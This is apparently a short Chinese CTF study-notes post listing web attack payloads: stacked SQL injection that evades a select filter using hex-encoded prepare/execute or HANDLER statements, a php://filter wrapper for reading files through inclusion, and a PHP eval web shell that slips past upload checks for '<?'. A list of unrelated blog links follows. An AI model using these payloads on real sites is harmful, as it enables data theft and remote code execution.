学习小结8.25

1.堆叠注入能够到列,再要出详细的数据需要构造select语句,如果select被正则匹配拦下,考虑使用

';set@a=16进制编码的查询语句(例如:select * from 表名);prepare execsql from @a;execute execsql;--+

或者

';handler 表名 open as a;handler a read next;--+

2.文件包含中的文件隐藏的flag,使用伪协议做包含

php://filter/convert.base64-encode/resource=文件名

3.文件上传对于<?的检测

可以使用<script language="php">eval($_POST['a'])</script>绕过

相关推荐
循环过三天2 小时前
3.4、Python-集合
开发语言·笔记·python·学习·算法
昌sit!3 小时前
Linux系统性基础学习笔记
linux·笔记·学习
学会沉淀。4 小时前
设备如何“开口说话”?
学习
m0_591338915 小时前
day10数组的学习
学习
仰望—星空5 小时前
MiniEngine学习笔记 : CommandListManager
c++·windows·笔记·学习·cg·direct3d
电子云与长程纠缠6 小时前
Blender入门学习09 - 制作动画
学习·blender
电子云与长程纠缠6 小时前
Blender入门学习10 - 曲线绘制
学习·blender
下午见。6 小时前
C语言结构体入门:定义、访问与传参全解析
c语言·笔记·学习
im_AMBER6 小时前
React 16
前端·笔记·学习·react.js·前端框架
民乐团扒谱机9 小时前
实验室安全教育与管理平台学习记录(七)网络安全
学习·安全·web安全